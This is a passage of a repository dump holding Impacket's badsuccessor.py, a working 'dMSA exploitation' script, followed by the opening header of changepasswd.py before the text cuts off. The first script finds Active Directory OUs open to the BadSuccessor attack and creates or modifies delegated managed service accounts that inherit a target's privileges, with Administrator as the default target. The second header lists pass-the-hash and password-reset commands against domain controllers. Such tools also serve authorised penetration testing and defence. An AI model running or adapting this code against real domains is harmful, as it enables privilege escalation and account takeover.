"examples/badsuccessor.py", "content": "#!/usr/bin/env python3\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies \n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script is a tool for dMSA exploitation.\n# Search function is based on AKAMAI Get-BadSuccessorOUPermissions.ps1 (https://github.com/akamai/BadSuccessor/blob/main/Get-BadSuccessorOUPermissions.ps1)\n# It allows to add/delete Delegated Managed Service Accounts (dMSA) in a specific OU, search for OUs vulnerable to BadSuccessor attack\n# Author:\n# Ilya Yatsenko (@fulc2um)\n\n\nfrom __future__ import division\nfrom __future__ import print_function\nfrom __future__ import unicode_literals\n\nimport argparse\nimport logging\nimport random\nimport string\nimport sys\nimport ldap3\n\nfrom impacket import version\nfrom impacket.examples import logger\nfrom impacket.examples.utils import parse_identity, parse_target, init_ldap_session\nfrom impacket.ldap import ldaptypes\n\n\nclass BADSUCCESSOR:\n def __init__(self, username, password, domain, lmhash, nthash, cmdLineOptions):\n self.__username = username\n self.__password = password\n self.__domain = domain\n self.__lmhash = lmhash\n self.__nthash = nthash\n self.__aesKey = cmdLineOptions.aesKey\n self.__doKerberos = cmdLineOptions.k\n self.__target = cmdLineOptions.dc_host\n self.__kdcHost = cmdLineOptions.dc_host\n self.__dmsaName = cmdLineOptions.dmsa_name\n self.__method = cmdLineOptions.method\n self.__port = cmdLineOptions.port\n self.__action = cmdLineOptions.action\n self.__targetIp = cmdLineOptions.dc_ip\n self.__baseDN = cmdLineOptions.baseDN\n self.__targetOu = cmdLineOptions.target_ou\n self.__principalsAllowed = cmdLineOptions.principals_allowed\n self.__targetAccount = cmdLineOptions.target_account\n self.__dnsHostName = cmdLineOptions.dns_hostname\n\n if self.__targetIp is not None:\n self.__kdcHost = self.__targetIp\n\n if self.__method not in ['LDAP', 'LDAPS']:\n raise ValueError(\"Unsupported method %s\" % self.__method)\n\n if self.__doKerberos and cmdLineOptions.dc_host is None:\n raise ValueError(\"Kerberos auth requires DNS name of the target DC. Use -dc-host.\")\n\n if self.__method == 'LDAPS' and not '.' in self.__domain:\n logging.warning('\\'%s\\' doesn\\'t look like a FQDN. Generating baseDN will probably fail.' % self.__domain)\n\n if self.__target is None:\n if not '.' in self.__domain:\n logging.warning('No DC host set and \\'%s\\' doesn\\'t look like a FQDN. DNS resolution of short names will probably fail.' % self.__domain)\n self.__target = self.__domain\n\n if self.__port is None:\n if self.__method == 'LDAP':\n self.__port = 389\n elif self.__method == 'LDAPS':\n self.__port = 636\n\n def run(self):\n # Create the baseDN if not provided\n if self.__baseDN is None:\n domainParts = self.__domain.split('.')\n self.__baseDN = ''\n for i in domainParts:\n self.__baseDN += 'dc=%s,' % i\n # Remove last ','\n self.__baseDN = self.__baseDN[:-1]\n\n\n try:\n use_ldaps = (self.__method == 'LDAPS')\n \n # For Kerberos authentication, ensure proper target resolution\n if self.__doKerberos:\n target_host = self.__target if self.__target else self.__domain\n dc_ip = self.__kdcHost if self.__kdcHost else self.__targetIp\n else:\n target_host = self.__target if self.__target else self.__domain\n dc_ip = self.__targetIp\n \n _, ldapConnection = init_ldap_session(\n domain=self.__domain,\n username=self.__username,\n password=self.__password,\n lmhash=self.__lmhash,\n nthash=self.__nthash,\n k=self.__doKerberos,\n dc_ip=dc_ip,\n dc_host=target_host,\n aesKey=self.__aesKey,\n use_ldaps=use_ldaps\n )\n \n except Exception as e:\n raise Exception('Could not connect to LDAP server: %s' % str(e))\n\n # Update target for logging\n connectTo = dc_ip if dc_ip else target_host\n logging.info('Connected to %s as %s\\\\%s' % (connectTo, self.__domain, self.__username))\n\n\n if self.__action == 'add':\n result = self.add_dmsa(ldapConnection)\n elif self.__action == 'delete':\n result = self.delete_dmsa(ldapConnection)\n elif self.__action == 'modify':\n result = self.modify_dmsa(ldapConnection)\n elif self.__action == 'search':\n result = self.search_ous(ldapConnection)\n else:\n logging.error('Unknown action: %s' % self.__action)\n result = False\n\n ldapConnection.unbind()\n return result\n\n def delete_dmsa(self, ldapConnection):\n try:\n if not self.__dmsaName:\n logging.error('dMSA name is required for deletion. Use -dmsa-name parameter.')\n return False\n \n if not self.__targetOu:\n logging.error('Target OU is required for dMSA deletion. Use -target-ou parameter.')\n return False\n \n dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)\n if not self.check_account_exists(ldapConnection, dmsa_dn):\n logging.error('dMSA account does not exist: %s' % dmsa_dn)\n return False\n \n success = ldapConnection.delete(dmsa_dn)\n \n logging.info(\"\")\n logging.info(\"%-30s %s\" % (\"dMSA Deletion Results\", \"\"))\n logging.info(\"%-30s %s\" % (\"-\" * 30, \"-\" * 30))\n logging.info(\"%-30s %s\" % (\"dMSA Name:\", '%s$' % self.__dmsaName))\n logging.info(\"%-30s %s\" % (\"Status:\", \"SUCCESS\" if success else \"FAILED\"))\n \n if not success and ldapConnection.result:\n logging.error(\"%-30s %s\" % (\"Error:\", ldapConnection.result))\n \n return success\n \n except Exception as e:\n logging.error('dMSA deletion failed: %s' % str(e))\n return False\n \n def check_account_exists(self, ldapConnection, dn):\n try:\n success = ldapConnection.search(\n search_base=dn,\n search_filter='(objectClass=*)',\n search_scope=ldap3.BASE,\n attributes=['cn']\n )\n \n return success and len(ldapConnection.entries) > 0\n \n except Exception as e:\n logging.debug('Error checking account existence: %s' % str(e))\n # If we can't determine, assume it doesn't exist to avoid blocking operations\n return False\n\n def search_ous(self, ldapConnection):\n try:\n logging.info('Searching for OUs vulnerable to BadSuccessor attack...')\n \n if not ldapConnection.bound:\n logging.error('LDAP connection is not bound')\n return False\n \n success = ldapConnection.search(\n search_base=self.__baseDN,\n search_filter='(&(objectCategory=computer)(objectClass=computer)(userAccountControl:1.2.840.113556.1.4.803:=8192))',\n search_scope=ldap3.SUBTREE,\n attributes=['operatingSystem', 'operatingSystemVersion']\n )\n\n if not success:\n logging.error('Failed to search for Domain Controllers: %s' % ldapConnection.result)\n return False\n\n prereq_flag = False\n for entry in ldapConnection.entries:\n if ('operatingSystem' and 'operatingSystemVersion') not in entry:\n logging.error('Could not retrieve operating system information for Domain Controller: %s' % entry.entry_dn)\n pass\n else:\n if 'Windows Server 2025' in entry.operatingSystem.value or '26100' in entry.operatingSystemVersion.value:\n logging.info('Found Windows Server 2025 Domain Controller: %s' % entry.entry_dn)\n prereq_flag = True\n break\n \n if not prereq_flag:\n logging.info('No Windows Server 2025 Domain Controllers found. This script requires at least one DC running Windows Server 2025.')\n logging.info('Resulting list of Identities/OUs will show Identities that have permissions to create objects in OUs.')\n \n\n success = ldapConnection.search(\n search_base=self.__baseDN,\n search_filter='(objectClass=organizationalUnit)',\n search_scope=ldap3.SUBTREE,\n attributes=['distinguishedName', 'nTSecurityDescriptor'],\n controls=ldap3.protocol.microsoft.security_descriptor_control(sdflags=0x5)\n )\n\n \n if not success:\n logging.error('Failed to search for organizational units: %s' % ldapConnection.result)\n return False\n \n # Store the OU entries before they get overwritten by other searches\n ou_entries = list(ldapConnection.entries)\n logging.info('Found %d organizational units' % len(ou_entries))\n \n # Get domain SID for filtering excluded accounts\n try:\n success = ldapConnection.search(\n search_base=self.__baseDN,\n search_filter='(objectClass=domain)',\n search_scope=ldap3.BASE,\n attributes=['objectSid']\n )\n \n if success and len(ldapConnection.entries) > 0:\n entry = ldapConnection.entries[0]\n if 'objectSid' in entry:\n domain_sid = entry.objectSid.value\n except Exception as e:\n logging.error('Failed to retrieve domain SID: %s' % str(e))\n return False\n allowed_identities = {}\n \n relevant_rights = {\n \"CreateChild\": 0x00000001,\n \"GenericAll\": 0x10000000,\n \"WriteDACL\": 0x00040000,\n \"WriteOwner\": 0x00080000\n }\n \n relevant_object_types = {\n \"00000000-0000-0000-0000-000000000000\": \"All Objects\",\n \"0feb936f-47b3-49f2-9386-1dedc2c23765\": \"msDS-DelegatedManagedServiceAccount\",\n }\n \n for entry in ou_entries:\n try:\n ou_dn = str(entry.entry_dn)\n \n if 'nTSecurityDescriptor' not in entry or not entry.nTSecurityDescriptor.value:\n continue\n \n sd_data = entry.nTSecurityDescriptor.value\n sd = ldaptypes.SR_SECURITY_DESCRIPTOR(data=sd_data)\n \n # Process DACL entries (ACEs)\n dacl = sd['Dacl']\n if dacl and hasattr(dacl, 'aces') and dacl.aces:\n for ace in dacl.aces:\n # Only process ALLOW ACEs\n if ace['AceType'] != ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE:\n continue\n \n # Check if ACE has relevant rights\n mask = int(ace['Ace']['Mask']['Mask'])\n has_relevant_right = any(mask & right_value for right_value in relevant_rights.values())\n if not has_relevant_right:\n continue\n \n # Check object type (must match relevant object types)\n object_type = getattr(ace['Ace'], 'ObjectType', None)\n if object_type:\n object_guid = str(object_type).lower()\n if object_guid not in relevant_object_types:\n continue\n \n sid = ace['Ace']['Sid'].formatCanonical()\n \n if self.is_excluded_sid(sid, domain_sid):\n continue\n \n identity = self.resolve_sid_to_name(ldapConnection, sid)\n if identity not in allowed_identities:\n allowed_identities[identity] = []\n if ou_dn not in allowed_identities[identity]:\n allowed_identities[identity].append(ou_dn)\n \n try:\n owner_sid = sd['OwnerSid'].formatCanonical()\n if not self.is_excluded_sid(owner_sid, domain_sid):\n identity = self.resolve_sid_to_name(ldapConnection, owner_sid)\n if identity not in allowed_identities:\n allowed_identities[identity] = []\n if ou_dn not in allowed_identities[identity]:\n allowed_identities[identity].append(ou_dn)\n except:\n pass\n \n except Exception as e:\n continue\n \n if allowed_identities:\n logging.info('Found %d identities with BadSuccessor privileges:' % len(allowed_identities))\n logging.info(\"\")\n logging.info(\"%-50s %s\" % (\"Identity\", \"Vulnerable OUs\"))\n logging.info(\"%-50s %s\" % (\"-\" * 50, \"-\" * 30))\n \n for identity, ous in allowed_identities.items():\n ou_list = \"{%s}\" % \", \".join(ous)\n logging.info(\"%-50s %s\" % (identity[:50], ou_list))\n else:\n logging.info('No identities found with BadSuccessor privileges')\n logging.info(\"\")\n logging.info(\"%-50s %s\" % (\"Identity\", \"Vulnerable OUs\"))\n logging.info(\"%-50s %s\" % (\"-\" * 50, \"-\" * 30))\n logging.info(\"%-50s %s\" % (\"(none)\", \"(none)\"))\n return True\n \n except Exception as e:\n logging.error('BadSuccessor search failed: %s' % str(e))\n return False\n\n def is_excluded_sid(self, sid, domain_sid):\n excluded_sids = [\"S-1-5-32-544\", \"S-1-5-18\"] # BUILTIN\\Administrators, SYSTEM\n excluded_suffixes = [\"-512\", \"-519\"] # Domain Admins, Enterprise Admins\n \n if sid in excluded_sids:\n return True\n \n if domain_sid and sid.startswith(domain_sid):\n for suffix in excluded_suffixes:\n if sid.endswith(suffix):\n return True\n \n return False\n\n def resolve_sid_to_name(self, ldapConnection, sid):\n try:\n # Handle well-known SIDs \n well_known_sids = {\n 'S-1-1-0': 'Everyone',\n 'S-1-5-11': 'NT AUTHORITY\\\\Authenticated Users',\n 'S-1-5-32-544': 'BUILTIN\\\\Administrators',\n 'S-1-5-32-545': 'BUILTIN\\\\Users',\n 'S-1-5-32-546': 'BUILTIN\\\\Guests',\n 'S-1-5-18': 'NT AUTHORITY\\\\SYSTEM',\n 'S-1-5-19': 'NT AUTHORITY\\\\LOCAL SERVICE',\n 'S-1-5-20': 'NT AUTHORITY\\\\NETWORK SERVICE',\n 'S-1-3-0': 'CREATOR OWNER',\n 'S-1-3-1': 'CREATOR GROUP',\n 'S-1-5-9': 'NT AUTHORITY\\\\ENTERPRISE DOMAIN CONTROLLERS',\n 'S-1-5-10': 'NT AUTHORITY\\\\SELF',\n }\n \n if sid in well_known_sids:\n return well_known_sids[sid]\n \n success = ldapConnection.search(\n search_base=self.__baseDN,\n search_filter='(objectSid=%s)' % sid,\n search_scope=ldap3.SUBTREE,\n attributes=['sAMAccountName']\n )\n \n if success and len(ldapConnection.entries) > 0:\n entry = ldapConnection.entries[0]\n if 'sAMAccountName' in entry:\n username = entry.sAMAccountName.value\n return '%s\\\\%s' % (self.__domain.upper(), username)\n \n return sid\n \n except Exception as e:\n logging.debug('Error resolving SID %s: %s' % (sid, str(e)))\n return sid\n\n\n def generate_dmsa_name(self):\n random_suffix = ''.join(random.choices(string.ascii_uppercase + string.digits, k=8))\n return 'dMSA-%s' % random_suffix\n\n def convert_sid_to_string(self, sid_bytes):\n try:\n if not sid_bytes:\n return None\n \n if isinstance(sid_bytes, str):\n sid_bytes = sid_bytes.encode('latin-1')\n \n if len(sid_bytes) < 8:\n return None\n \n revision = sid_bytes[0]\n authority_count = sid_bytes[1]\n \n expected_length = 8 + (authority_count * 4)\n if len(sid_bytes) < expected_length:\n return None\n \n authority = int.from_bytes(sid_bytes[2:8], 'big')\n \n subauthorities = []\n for i in range(authority_count):\n offset = 8 + (i * 4)\n if offset + 4 <= len(sid_bytes):\n subauth = int.from_bytes(sid_bytes[offset:offset+4], 'little')\n subauthorities.append(str(subauth))\n else:\n break\n \n if subauthorities:\n sid_string = 'S-%d-%d-%s' % (revision, authority, '-'.join(subauthorities))\n else:\n sid_string = 'S-%d-%d' % (revision, authority)\n \n return sid_string\n \n except Exception as e:\n logging.debug('Error converting SID bytes to string: %s' % str(e))\n return None\n\n def build_security_descriptor(self, user_sid):\n try:\n if not user_sid:\n return None\n # Handle both string and bytes SID formats\n if isinstance(user_sid, str):\n if user_sid.startswith('S-'):\n sid_string = user_sid\n else:\n return None\n else:\n sid_string = self.convert_sid_to_string(user_sid)\n if not sid_string:\n return None\n sd = ldaptypes.SR_SECURITY_DESCRIPTOR()\n sd['Revision'] = b'\\x01'\n sd['Sbz1'] = b'\\x00'\n sd['Control'] = 32772\n sd['OwnerSid'] = ldaptypes.LDAP_SID()\n sd['OwnerSid'].fromCanonical(sid_string)\n sd['GroupSid'] = b''\n sd['Sacl'] = b''\n acl = ldaptypes.ACL()\n acl['AclRevision'] = 4\n acl['Sbz1'] = 0\n acl['Sbz2'] = 0\n acl.aces = []\n \n nace1 = ldaptypes.ACE()\n nace1['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE\n nace1['AceFlags'] = 0x00\n acedata1 = ldaptypes.ACCESS_ALLOWED_ACE()\n acedata1['Mask'] = ldaptypes.ACCESS_MASK()\n acedata1['Mask']['Mask'] = 0x000F01FF\n acedata1['Sid'] = ldaptypes.LDAP_SID()\n acedata1['Sid'].fromCanonical(sid_string)\n nace1['Ace'] = acedata1\n acl.aces.append(nace1)\n \n nace2 = ldaptypes.ACE()\n nace2['AceType'] = ldaptypes.ACCESS_ALLOWED_ACE.ACE_TYPE\n nace2['AceFlags'] = 0x00\n acedata2 = ldaptypes.ACCESS_ALLOWED_ACE()\n acedata2['Mask'] = ldaptypes.ACCESS_MASK()\n acedata2['Mask']['Mask'] = 0x10000000 # GenericAll\n acedata2['Sid'] = ldaptypes.LDAP_SID()\n acedata2['Sid'].fromCanonical(sid_string)\n nace2['Ace'] = acedata2\n acl.aces.append(nace2)\n sd['Dacl'] = acl\n return sd.getData()\n except Exception as e:\n logging.debug('Error building security descriptor: %s' % str(e))\n return None\n \n\n def add_dmsa(self, ldapConnection):\n try:\n if not self.__dmsaName:\n self.__dmsaName = self.generate_dmsa_name()\n \n if not self.__targetOu:\n logging.error('Target OU is required for dMSA creation. Use -target-ou parameter.')\n return False\n \n dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)\n if self.check_account_exists(ldapConnection, dmsa_dn):\n logging.error('dMSA account already exists: %s' % dmsa_dn)\n return False\n \n principals_allowed = self.__principalsAllowed if self.__principalsAllowed else self.__username\n target_account = self.__targetAccount if self.__targetAccount else 'Administrator'\n \n dns_hostname = self.__dnsHostName if self.__dnsHostName else '%s.%s' % (self.__dmsaName.lower(), self.__domain)\n \n # Validate DNS hostname format\n if not dns_hostname or '.' not in dns_hostname:\n dns_hostname = '%s.%s' % (self.__dmsaName.lower(), self.__domain)\n \n attributes = {\n 'objectClass': ['msDS-DelegatedManagedServiceAccount'],\n 'cn': self.__dmsaName,\n 'sAMAccountName': '%s$' % self.__dmsaName,\n 'dNSHostName': dns_hostname,\n 'userAccountControl': 4096,\n 'msDS-ManagedPasswordInterval': 30,\n 'msDS-DelegatedMSAState': 2,\n 'msDS-SupportedEncryptionTypes': 28,\n 'accountExpires': 9223372036854775807,\n }\n\n group_msa_membership = None\n try:\n search_filter = '(&(objectClass=user)(sAMAccountName=%s))' % principals_allowed\n success = ldapConnection.search(\n search_base=self.__baseDN,\n search_filter=search_filter,\n search_scope=ldap3.SUBTREE,\n attributes=['objectSid'])\n if success and len(ldapConnection.entries) > 0:\n entry = ldapConnection.entries[0]\n if 'objectSid' in entry:\n user_sid = entry.objectSid.value\n if user_sid:\n descriptor = self.build_security_descriptor(user_sid)\n group_msa_membership = descriptor\n attributes['nTSecurityDescriptor'] = descriptor\n \n except Exception as e:\n logging.debug('Error building MSA membership: %s' % str(e))\n return False\n \n if group_msa_membership:\n attributes['msDS-GroupMSAMembership'] = group_msa_membership\n\n target_dn = None\n success = ldapConnection.search(\n search_base=self.__baseDN, \n search_filter='(&(objectClass=*)(sAMAccountName=%s))' % target_account,\n search_scope=ldap3.SUBTREE,\n attributes=['distinguishedName', 'objectClass']\n )\n\n if success and len(ldapConnection.entries) > 0:\n for entry in ldapConnection.entries:\n object_classes = [str(oc).lower() for oc in entry.objectClass.values]\n if 'user' in object_classes or 'computer' in object_classes:\n target_dn = str(entry.entry_dn)\n # Return first match if no user/computer found\n target_dn = str(ldapConnection.entries[0].entry_dn)\n\n if target_dn:\n attributes['msDS-ManagedAccountPrecededByLink'] = target_dn\n \n\n \n else:\n logging.error('Target account not found: %s' % target_account)\n return False\n \n success = ldapConnection.add(dmsa_dn, attributes=attributes)\n\n if success:\n logging.info(\"\")\n logging.info(\"%-30s %s\" % (\"-\" * 30, \"-\" * 30))\n logging.info(\"%-30s %s\" % (\"dMSA Name:\", '%s$' % self.__dmsaName))\n logging.info(\"%-30s %s\" % (\"DNS Hostname:\", attributes.get('dNSHostName', 'Unknown')))\n logging.info(\"%-30s %s\" % (\"Migration status: \", attributes.get('msDS-DelegatedMSAState', 'Unknown')))\n logging.info(\"%-30s %s\" % (\"Principals Allowed:\", principals_allowed))\n logging.info(\"%-30s %s\" % (\"Target Account:\", target_account))\n return True\n else:\n if ldapConnection.result:\n logging.error('LDAP error: %s' % ldapConnection.result)\n return False\n \n except Exception as e:\n logging.error('dMSA creation failed: %s' % str(e))\n return False\n \n def modify_dmsa(self, ldapConnection):\n try:\n dmsa_dn = 'CN=%s,%s' % (self.__dmsaName, self.__targetOu)\n\n if not self.check_account_exists(ldapConnection, dmsa_dn):\n logging.error('dMSA account does not exist: %s' % dmsa_dn)\n return False\n\n # Get current target account value\n success = ldapConnection.search(\n search_base=dmsa_dn,\n search_filter='(objectClass=msDS-DelegatedManagedServiceAccount)',\n search_scope=ldap3.BASE,\n attributes=['msDS-ManagedAccountPrecededByLink']\n )\n \n current_target_dn = None\n if success and len(ldapConnection.entries) > 0:\n entry = ldapConnection.entries[0]\n if hasattr(entry, 'msDS-ManagedAccountPrecededByLink'):\n current_target_dn = entry['msDS-ManagedAccountPrecededByLink'].value\n\n success = ldapConnection.search(\n search_base=self.__baseDN, \n search_filter='(&(objectClass=*)(sAMAccountName=%s))' % self.__targetAccount,\n search_scope=ldap3.SUBTREE,\n attributes=['distinguishedName', 'objectClass']\n )\n\n if not (success and len(ldapConnection.entries) > 0):\n logging.error('Target account not found: %s' % self.__targetAccount)\n return False\n\n target_dn = None\n for entry in ldapConnection.entries:\n object_classes = [str(oc).lower() for oc in entry.objectClass.values]\n if 'user' in object_classes or 'computer' in object_classes:\n target_dn = str(entry.entry_dn)\n break\n \n if not target_dn:\n target_dn = str(ldapConnection.entries[0].entry_dn)\n\n if current_target_dn == target_dn:\n logging.info('Target account is already set to: %s' % target_dn)\n logging.info('No modifications needed.')\n return True\n\n modifications = {\n 'msDS-ManagedAccountPrecededByLink': [(ldap3.MODIFY_REPLACE, [target_dn])]\n }\n \n success = ldapConnection.modify(dmsa_dn, modifications)\n \n if success:\n logging.info('dMSA target account modified: %s -> %s' % (current_target_dn or '(not set)', target_dn))\n return True\n else:\n logging.error('Failed to modify dMSA: %s' % ldapConnection.result)\n return False\n \n except Exception as e:\n logging.error('Error modifying dMSA: %s' % str(e))\n return False\n\n\nif __name__ == '__main__':\n print(version.BANNER)\n\n parser = argparse.ArgumentParser(add_help = True, description = \"dMSA exploitation tool.\")\n\n parser.add_argument('account', action='store', metavar='[domain/]username[:password]', help='Account used to authenticate to DC.')\n parser.add_argument('-dmsa-name', action='store', metavar='dmsa_name', help='Name of dMSA to add. If omitted, a random dMSA-[A-Z0-9]{8} will be used.')\n parser.add_argument('-action', choices=['add', 'delete', 'modify', 'search'], default='search', help='Action to perform: add (requires -target-ou), delete (requires -dmsa-name, -target-ou), modify (requires -dmsa-name, -target-ou and -target-account), or search a dMSA.')\n parser.add_argument('-target-ou', action='store', metavar='OU_DN', help='Specific OU to check for dMSA creation capabilities (e.g., \"OU=weakOU,DC=domain,DC=local\")')\n parser.add_argument('-principals-allowed', action='store', metavar='USERNAME', help='Username allowed to retrieve the managed password. If omitted, current username will be used.')\n parser.add_argument('-target-account', action='store', metavar='USERNAME', default='Administrator', help='Target user or computer account DN to set for msDS-ManagedAccountPrecededByLink (can target Domain Controllers, Domain Admins, Protected Users, etc.)')\n parser.add_argument('-dns-hostname', action='store', metavar='HOSTNAME', help='DNS hostname for the dMSA. If omitted, will be generated as dmsaname.domain.')\n parser.add_argument('-ts', action='store_true', help='Adds timestamp to every logging output')\n parser.add_argument('-debug', action='store_true', help='Turn DEBUG output ON')\n parser.add_argument('-method', choices=['LDAP', 'LDAPS'], default='LDAPS', help='Method of adding the computer. LDAPS has some certificate requirements and isn\\'t always available.')\n\n parser.add_argument('-port', type=int, choices=[389, 636], help='Destination port to connect to. LDAP defaults to 389, LDAPS to 636.')\n\n group = parser.add_argument_group('LDAP')\n group.add_argument('-baseDN', action='store', metavar='DC=test,DC=local', help='Set baseDN for LDAP. If ommited, the domain part (FQDN) specified in the account parameter will be used.')\n\n group = parser.add_argument_group('authentication')\n group.add_argument('-hashes', action=\"store\", metavar = \"LMHASH:NTHASH\", help='NTLM hashes, format is LMHASH:NTHASH')\n group.add_argument('-no-pass', action=\"store_true\", help='don\\'t ask for password (useful for -k)')\n group.add_argument('-k', action=\"store_true\", help='Use Kerberos authentication. Grabs credentials from ccache file (KRB5CCNAME) based on account parameters. If valid credentials cannot be found, it will use the ones specified in the command line')\n group.add_argument('-aesKey', action=\"store\", metavar = \"hex key\", help='AES key to use for Kerberos Authentication (128 or 256 bits)')\n group.add_argument('-dc-host', action='store',metavar = \"hostname\", help='Hostname of the domain controller to use. If ommited, the domain part (FQDN) specified in the account parameter will be used')\n group.add_argument('-dc-ip', action='store',metavar = \"ip\", help='IP of the domain controller to use. Useful if you can\\'t translate the FQDN.')\n\n if len(sys.argv)==1:\n parser.print_help()\n sys.exit(1)\n\n options = parser.parse_args()\n\n if options.action == 'add':\n required_args = []\n if not options.target_ou:\n required_args.append('-target-ou')\n \n if required_args:\n parser.error('Action \"add\" requires the following arguments: %s' % ', '.join(required_args))\n \n elif options.action == 'delete':\n required_args = []\n if not options.dmsa_name:\n required_args.append('-dmsa-name')\n if not options.target_ou:\n required_args.append('-target-ou')\n \n if required_args:\n parser.error('Action \"delete\" requires the following arguments: %s' % ', '.join(required_args))\n \n elif options.action == 'modify':\n required_args = []\n if not options.dmsa_name:\n required_args.append('-dmsa-name')\n if not options.target_ou:\n required_args.append('-target-ou')\n if not options.target_account:\n required_args.append('-target-account')\n if required_args:\n parser.error('Action \"modify\" requires the following arguments: %s' % ', '.join(required_args))\n\n logger.init(options.ts, options.debug)\n \n if '@' in options.account and options.dc_host is None:\n domain, username, password, remote_host = parse_target(options.account)\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n options.dc_host = remote_host\n \n if password == '' and username != '' and options.hashes is None and not options.no_pass and options.aesKey is None:\n from getpass import getpass\n password = getpass(\"Password:\")\n \n lmhash = ''\n nthash = ''\n if options.hashes is not None:\n lmhash, nthash = options.hashes.split(':')\n if lmhash == '':\n lmhash = 'AAD3B435B51404EEAAD3B435B51404EE' \n \n if options.aesKey is not None:\n options.k = True\n else:\n domain, username, password, lmhash, nthash, options.k = parse_identity(options.account, options.hashes, options.no_pass, options.aesKey, options.k)\n\n if domain == '':\n logging.critical('Domain should be specified!')\n sys.exit(1)\n\n try:\n executer = BADSUCCESSOR(username, password, domain, lmhash, nthash, options)\n executer.run()\n except Exception as e:\n print(str(e))\n" }, { "path": "examples/changepasswd.py", "content": "#!/usr/bin/env python\n# Impacket - Collection of Python classes for working with network protocols.\n#\n# Copyright Fortra, LLC and its affiliated companies\n#\n# All rights reserved.\n#\n# This software is provided under a slightly modified version\n# of the Apache Software License. See the accompanying LICENSE file\n# for more information.\n#\n# Description:\n# This script is a collection of functions to change or reset the password of\n# a user via various protocols. It supports:\n# - MS-SAMR over SMB or RPC transport (NetUserChangePassword and NetUserSetInfo protocols)\n# - Kerberos change-password and reset-password protocols\n# - LDAP password change and reset\n#\n# The last documented mechanism (XACT-SMB) is not implemented.\n#\n# A password change can usually be initiated when the previous password (or its\n# hash) is known, by the account itself or any other user.\n# A password reset requires additional permissions and may in some case bypass\n# password policies.\n#\n# Tradeoff of the different protocols:\n# - MS-SAMR over SMB: (smbpasswd)\n# * SMB communication with the server or domain controller is required\n# * Can perform password change when the current password is expired\n# * Supports plaintext password and NTLM hashes as the new password value\n# * If provided as plaintext, password policy is enforced\n# * If using NTLM hashes, the new password is flagged as expired\n# * If using password reset with a NTLM hash, password policy and history is ignored\n# * When using hashes for change or reset, Kerberos keys are not created\n# - MS-SAMR over MS-RPC:\n# * RPC communication over TCP/135 and random ports\n# * Cannot get a handle on user object with default AD configuration:\n# - cannot use hSamrChangePasswordUser to change password with hashes only\n# - cannot use hSamrSetInformationUser to reset the password\n# * Password policy is enforced\n# - Kerberos Change Password: (kpasswd)\n# * Must use Kerberos authentication\n# * Must have a valid TGT/key or valid password for the user\n# * Must provide the new password as plaintext\n# * Password policy is enforced\n# - Kerberos Set Password:\n# * Must use Kerberos authentication\n# * Must have a valid TGT/key or valid password for the admin\n# * Must provide the new password as plaintext\n# - LDAP password change:\n# * The server must support TLS. If the DC is misconfigured, you cannot connect\n# * Must provide the old and new passwords as plaintext\n# * Password policy is enforced\n# - LDAP password set:\n# * The server must support TLS. If the DC is misconfigured, you cannot connect\n# * Must provide the new password as plaintext\n#\n# Examples:\n# SAMR protocol over SMB transport to change passwords (like smbpasswd, -protocol smb-samr is implied)\n# changepasswd.py j.doe@192.168.1.11\n# changepasswd.py contoso.local/j.doe@DC1 -hashes :fc525c9683e8fe067095ba2ddc971889\n# changepasswd.py -protocol smb-samr contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n# changepasswd.py contoso.local/j.doe:'Passw0rd!'@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb\n# changepasswd.py contoso.local/j.doe@DC1 -newhashes :126502da14a98b58f2c319b81b3a49cb -k -no-pass\n#\n# SAMR protocol over SMB transport to reset passwords (like smbpasswd, -protocol smb-samr is implied)\n# changepasswd.py -reset contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n# -altuser administrator -altpass 'Adm1nPassw0rd!'\n# changepasswd.py -reset -protocol smb-samr contoso.local/j.doe:'Passw0rd!'@DC1\n# -newhashes :126502da14a98b58f2c319b81b3a49cb -altuser CONTOSO/administrator -altpass 'Adm1nPassw0rd!'\n# changepasswd.py -reset SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502da14a98b58f2c319b81b3a49cb\n# -altuser CONTOSO/SrvAdm -althash 6fe945ead39a7a6a2091001d98a913ab\n# changepasswd.py -reset SRV01/administrator:'Passw0rd!'@10.10.13.37 -newhashes :126502da14a98b58f2c319b81b3a49cb\n# -altuser CONTOSO/DomAdm -k -no-pass\n#\n# SAMR protocol over MS-RPC transport to change passwords\n# changepasswd.py -protocol rpc-samr contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n#\n# Kerberos Change Password protocol (like kpasswd) (-newhashes is not supported and -k is implied)\n# changepasswd.py -protocol kpasswd contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n#\n# Kerberos Reset Password protocol (like kpasswd) (-newhashes is not supported and -k is implied)\n# changepasswd.py -reset -protocol kpasswd contoso.local/j.doe@DC1 -newpass 'N3wPassw0rd!'\n# -altuser CONTOSO/SrvAdm\n#\n# LDAP password change (like ldappasswd) (-newhashes is not supported)\n# changepasswd.py -p ldap contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n# changepasswd.py -p ldap -k contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n#\n# LDAP password set (-newhashes is not supported)\n# changepasswd.py -reset -p ldap contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n# -altuser administrator -althash 6fe945ead39a7a6a2091001d98a913ab\n# changepasswd.py -reset -p ldap -k contoso.local/j.doe:'Passw0rd!'@DC1 -newpass 'N3wPassw0rd!'\n# -altuser CONTOSO/SrvAdm -k -no-pass\n#\n#\n# This script is based on smbpasswd.py.\n#\n# Authors:\n# @snovvcrash\n# @alef-burzmali\n# @bransh\n# @Oddvarmoe\n# @p0dalirius\n#\n# References:\n# https://learn.microsoft.com/en-us/troubleshoot/windows-server/identity/password-change-mechanisms\n# [MS-SAMR] 